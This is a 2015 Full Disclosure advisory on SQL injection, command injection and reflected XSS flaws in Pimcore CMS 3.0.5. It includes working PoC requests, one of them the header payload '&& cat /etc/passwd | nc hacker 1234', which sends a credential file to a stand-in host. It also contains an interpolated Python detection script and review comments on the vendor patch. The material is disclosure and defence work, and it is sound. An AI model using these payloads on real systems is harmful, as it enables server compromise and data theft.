List: full-disclosure
Subject: [FD] Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-05-08 13:52:12
Message-ID: 554CBF8C.40403 () vulnerability-lab ! com
Document Title:
==============
Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities

References (Source):
===================
http://www.vulnerability-lab.com/get_content.php?id82

Release Date:
============
2015-05-08

Vulnerability Laboratory ID (VL-ID):
===================================
1482

Common Vulnerability Scoring System:
===================================
6.2
Product & Service Introduction:
==============================
Pimcore is a powerful and robust Zend Framework based PHP content management system (CMS) for creating and managing digital content and assets licensed under the open-source BSD license. Create outstanding digital experiences on the most flexible content management platform available. Manage and edit any type of digital content, for any device and channel in a 100% flexible and personalized way. Pimcore features award-winning single-source and multi-channel publishing functionality making it easy to manage, update, and integrate content and data from various sources. With pimcore brands can create and manage rich digital experiences for all of their output channels at once: web, mobile, apps, social platforms, print and digital signage. With pimcore you can truly `edit once & reuse anywhere`.

(Copy of the Homepage: https://www.pimcore.org/ )
Abstract Advisory Information:
=============================
An independent vulnerability laboratory researcher discovered multiple vulnerabilities in the official PIM Core v3.0.5 Content Management System.
Vulnerability Disclosure Timeline:
=================================
2015-05-01: Researcher Notification & Coordination (Alain Homewood - PwC New Zealand)
2015-05-01: Vendor Notification (PimCore CMS Security Team)
2015-05-05: Vendor Response/Feedback (PimCore CMS Security Team)
2015-05-07: Vendor Fix/Patch (PimCore Developer Team)
2015-05-08: Public Disclosure (Vulnerability Laboratory - Alain Homewood)
Discovery Status:
================
Published

Affected Product(s):
===================
Pimcore GmbH
Product: PimCore - Content Management System 3.0.5

Exploitation Technique:
======================
Remote

Severity Level:
==============
High
Technical Details & Description:
===============================
1.1
A (time-based) blind SQL injection web vulnerability has been discovered in the official Pimcore v3.0.5 Content Management System (web-application). The vulnerability allows remote attackers or privileged user accounts to execute their own SQL commands and compromise the dbms of the affected web-server.

A blind, authenticated SQL injection vulnerability exists in the filtering functionality of the HTTP error display in the administration panel. Authentication is required to exploit this vulnerability; however, low privilege users may have access to this functionality (it is located under `Marketing - Search Engine Optimisation`). The request method to execute the malicious SQL commands is GET, and the issue exists in the code of the web-application.

The security risk of the SQL injection vulnerability is estimated as high with a CVSS (common vulnerability scoring system) count of 6.2. Exploitation of the remote SQL injection web vulnerability requires a low privilege application user account and no user interaction. Successful exploitation of the SQL injection vulnerability results in application, web-service or dbms compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] ./misc/http-error-log
Vulnerable Parameter(s):
[+] _dc
1.2
A command execution web vulnerability has been discovered in the official Pimcore v3.0.5 Content Management System (web-application). The vulnerability allows remote attackers or local privileged user accounts to compromise the web-server by execution of malicious code.

The newsletter sending functionality uses unsanitized user provided input as part of a shell command. Authenticated users can manipulate these values to execute arbitrary commands. Note that low privilege users are likely to have access to this functionality (e.g. marketing users). Authentication is required to exploit this vulnerability. The request method to execute is POST, and the attack vector is located on the application-side of the online service.

The security risk of the arbitrary code execution vulnerability is estimated as high with a CVSS (common vulnerability scoring system) count of 6.1. Exploitation of the arbitrary code execution vulnerability requires no user interaction but a low privilege web-application user account. Successful exploitation of the remote vulnerability results in unauthorized execution of system specific commands.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /reports/newsletter/send
Vulnerable Parameter(s):
[+] HOST
1.3
Two reflected cross site scripting web vulnerabilities have been discovered in the official Pimcore v3.0.5 Content Management System (web-application). The vulnerabilities allow remote attackers to inject their own script code on the client-side of the user (browser) application requests.

Two reflected cross site scripting vulnerabilities exist in the administration panel. The issues are located in the `id` value echoed back through the `exportClassAction()` and `exportCustomLayOutDefinitionAction()` functions of the `userClassController.php` file. The request method to execute is GET, and the issues are located on the client-side of the online-service web application.

The security risk of the cross site scripting web vulnerabilities is estimated as medium with a CVSS (common vulnerability scoring system) count of 3.2. Exploitation of the cross site scripting vulnerabilities requires no user interaction or privileged web-application user account with password. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of the affected function or connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] exportClassAction()
[+] exportCustomLayOutDefinitionAction()
Vulnerable File(s):
[+] userClassController.php
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
======================
1.1
The blind SQL injection web vulnerability can be exploited by remote attackers with a low privilege application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

GET requests to /admin/misc/http-error-log fail to sanitise the value of the "limit" parameter, which allows users to inject SQL statements.

The unsanitized value of the parameter is included in the following SQL query in MiscController.php:

    $logs = $db->fetchAll("SELECT code,uri,`count`,date FROM http_error_log " . $condition . " ORDER BY " . $sort . " " . $dir . " LIMIT " . $offset . "," . $limit);

PoC or Exploitcode:
This vulnerability can be exploited with a time based technique as described on:
https://rateip.com/blog/sql-injections-in-mysql-limit-clause/
--- PoC Session Logs [GET] ---
GET /admin/misc/http-error-log?_dc30255599566&limit%20PROCEDURE%20analyse((select%20extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)%20LIKE%205,BENCHMARK(5000000,SHA1(1)),1))))),1)&filter= HTTP/1.1
Host: [VULNERABLE]
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-pimcore-csrf-token: 44efd8fe89806470db942bbb20ce1e6909eae4bc
X-Requested-With: XMLHttpRequest
Referer: http://[VULNERABLE]/admin/?_dc30255468
Cookie: pimcore_admin_sid=llcv0iq3bthb6alpscnj401dc1
Connection: keep-alive
Reference(s):
admin/misc/http-error-log?_dc
1.2
The code execution web vulnerability can be exploited by remote attackers without a privileged application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

The user's hostname is retrieved through $_SERVER['HTTP_X_FORWARDED_HOST'] or $_SERVER['HTTP_HOST'] and then included in a command that is executed (NewsletterController.php).

PoC: The command to be executed can be inserted into an X-Forwarded-Host HTTP header, for example:
--- PoC Session Logs [POST] ---
POST /admin/reports/newsletter/send HTTP/1.1
Host: 1[VULNERABLE]
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-pimcore-csrf-token: 44efd8fe89806470db942bbb20ce1e6909eae4bc
X-Requested-With: XMLHttpRequest
Referer: http://[VULNERABLE]/admin/?_dc30259866451
Content-Length: 20
Cookie: pimcore_admin_sid=llcv0iq3bthb6alpscnj401dc1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
X-forwarded-host: && cat /etc/passwd | nc hacker 1234
Reference(s):
/admin/reports/newsletter/send
1.3
The cross site scripting web vulnerabilities can be exploited by remote attackers with a low privilege application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Unsanitized user provided input in the "id" parameter is echoed back to the user in the exportClassAction() and exportCustomLayOutDefinitionAction() functions in userClassController.php.

Only authenticated users with permission to access the class export functionality are vulnerable to this (i.e. administrators).

PoC:
http://[VULNERABLE]/admin/class/export-class?id=<script>alert(1)</script>
http://[VULNERABLE]/admin/class/export-custom-layout-definition?id=<script>alert(1)</script>
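As an added example that is not part of the advisory or of Pimcore's own code, the following Python triage check applies the three findings above to request records: a non-integer limit/start or an unlisted sort/dir on the http-error-log endpoint, a non-hostname X-Forwarded-Host on the newsletter send endpoint, and a non-integer id on the class export actions. The sample requests are constructed here and the hostname grammar is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests (method, target, headers) mirroring the advisory's three
# PoCs plus one benign request; none of these values come from a real system.
SAMPLE_REQUESTS = [
    ("GET", "/admin/misc/http-error-log?_dc=1&limit=%20PROCEDURE%20analyse((select%20"
            "extractvalue(rand(),concat(0x3a,BENCHMARK(5000000,SHA1(1))))),1)&start=0", {}),
    ("POST", "/admin/reports/newsletter/send",
     {"X-Forwarded-Host": "&& cat /etc/passwd | nc hacker 1234"}),
    ("GET", "/admin/class/export-class?id=<script>alert(1)</script>", {}),
    ("GET", "/admin/misc/http-error-log?limit=25&start=0&sort=date&dir=DESC",
     {"X-Forwarded-Host": "cms.example.test"}),
]

INT_RE = re.compile(r"^-?\d+$")
# Assumed hostname grammar: labels, dots, optional port; anything a shell could parse
# (spaces, &, |, ;, quotes) fails this check.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:\d{1,5})?$")
SORT_COLUMNS = {"code", "uri", "count", "date"}  # columns selected by the quoted query

def triage(method, target, headers):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    url = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    hdrs = {k.lower(): v for k, v in headers.items()}
    findings = []
    if url.path == "/admin/misc/http-error-log":
        # limit/start are concatenated into LIMIT, sort/dir into ORDER BY (see the query above)
        for p in ("limit", "start"):
            if p in query and not INT_RE.match(query[p]):
                findings.append(f"sqli: non-integer {p!r} in LIMIT clause")
        if "sort" in query and query["sort"] not in SORT_COLUMNS:
            findings.append("sqli: unknown 'sort' column in ORDER BY")
        if "dir" in query and query["dir"].upper() not in ("ASC", "DESC"):
            findings.append("sqli: unexpected 'dir' in ORDER BY")
    if method == "POST" and url.path == "/admin/reports/newsletter/send":
        xfh = hdrs.get("x-forwarded-host")
        if xfh is not None and not HOST_RE.match(xfh):
            findings.append("cmdi: X-Forwarded-Host is not a plain hostname")
    if url.path in ("/admin/class/export-class",
                    "/admin/class/export-custom-layout-definition"):
        if "id" in query and not INT_RE.match(query["id"]):
            findings.append("xss: non-integer 'id' echoed by export action")
    return findings

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[0], req[1][:60], triage(*req) or "clean")
```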
Solution - Fix & Patch:
======================
URL(s):
https://github.com/pimcore/pimcore/commit/a01a4c87a782a7b20ccc4081c9340698f2d52573

pimcore/modules/admin/controllers/ClassController.php
@@ -484,10 +484,12 @@ public function getAllLayoutsAction() {
public function exportClassAction() {
$this->removeViewRenderer();
- $class = Object ClassDefinition::getById(intval($this->getParam(``id``)));
+
+ $id = intval($this->getParam(``id``));
+ $class = Object ClassDefinition::getById($id);
if (!$class instanceof Object ClassDefinition) {
- $errorMessage = ``: Class with id [ `` . $this->getParam(``id``) . `` \
not found. ]``; + $errorMessage = ``: Class with id [ `` . $id . `` not \
found. ]``; Logger::error($errorMessage);
echo $errorMessage;
} else {
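Review bot: the not-found branch still echoes $errorMessage straight into the response body; it is safe after this change only because intval() guarantees $id is an integer. Wrapping the echoed message in htmlspecialchars() (or returning a JSON error) would stop the output from depending on that cast being preserved, and the same message is built twice for the log and the echo, so one variable can serve both.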
@@ -496,14 +498,13 @@ public function exportClassAction() {
header(``Content-Disposition: attachment; filename= ``class_`` . \
$class->getName() . ``_export.json ````); echo $json;
}
-
}
public function exportCustomLayoutDefinitionAction() {
$this->removeViewRenderer();
- $id = $this->getParam(``id``);
+ $id = intval($this->getParam(``id``));
if ($id) {
$customLayout = Object ClassDefinition CustomLayout::getById($id);
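Review bot: with intval(), a missing or non-numeric id now becomes 0 and takes the else branch of if ($id), which lies outside this hunk; that branch is the other half of the same reflected XSS, so confirm it no longer echoes the raw id parameter before merging.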
pimcore/modules/reports/controllers/NewsletterController.php
@@ -185,7 +185,7 @@ public function sendAction() {
$letter = Newsletter Config::getByName($this->getParam(``name``));
if($letter) {
- $cmd = Tool Console::getPhpCli() . `` `` . realpath(PIMCORE_PATH . \
DIRECTORY_SEPARATOR . ``cli`` . DIRECTORY_SEPARATOR . ``send-newsletter.php``). `` `` \
. $letter->getName() . `` `` . Tool::getHostUrl(); + $cmd = Tool \
Console::getPhpCli() . `` `` . realpath(PIMCORE_PATH . DIRECTORY_SEPARATOR . ``cli`` \
. DIRECTORY_SEPARATOR . ``send-newsletter.php``). `` `` . \
escapeshellarg($letter->getName()) . `` `` . \
escapeshellarg(Tool::getHostUrl());
Tool Console::execInBackground($cmd, PIMCORE_LOG_DIRECTORY . \
``/newsletter--`` . $letter->getName() . ``.log``); }
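Review bot: escapeshellarg() on both arguments stops the shell from interpreting the header value, but Tool::getHostUrl() still derives its host from X-Forwarded-Host/Host as the advisory describes, so an attacker-chosen host is still passed to send-newsletter.php and will end up in the generated newsletter links; validating the host against the configured site domain would remove the root cause. The log path in execInBackground() also concatenates $letter->getName() unescaped; getByName() has validated it, but a basename() there would make that guarantee explicit.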
pimcore/modules/admin/controllers/MiscController.php
@@ -325,8 +325,8 @@ public function httpErrorLogAction() {
$db = Resource::get();
- $limit = $this->getParam(``limit``);
- $offset = $this->getParam(``start``);
+ $limit = intval($this->getParam(``limit``));
+ $offset = intval($this->getParam(``start``));
$sort = $this->getParam(``sort``);
$dir = $this->getParam(``dir``);
$filter = $this->getParam(``filter``);
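Review bot: only limit and start are cast here, while sort and dir remain raw request parameters and, per the query quoted in the PoC section ("ORDER BY " . $sort . " " . $dir . " LIMIT " ...), are concatenated into ORDER BY. Unless they are validated further down in the action, restrict $sort to the selected columns (code, uri, count, date) and $dir to ASC/DESC before building the query.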
Security Risk:
=============
1.1
The security risk of the blind sql injection web vulnerability in the pimcore cms is estimated as high. (CVSS 6.2)

1.2
The security risk of the code execution web vulnerability in the pimcore cms is estimated as high. (CVSS 6.1)

1.3
The security risk of the reflected cross site scripting web vulnerabilities in the pimcore cms are estimated as medium. (CVSS 3.2)
Credits & Authors:
=================
Alain Homewood - PwC New Zealand (http://www.pwc.co.nz/services/assurance-services/pwc-security/)
Disclaimer & Information:
========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/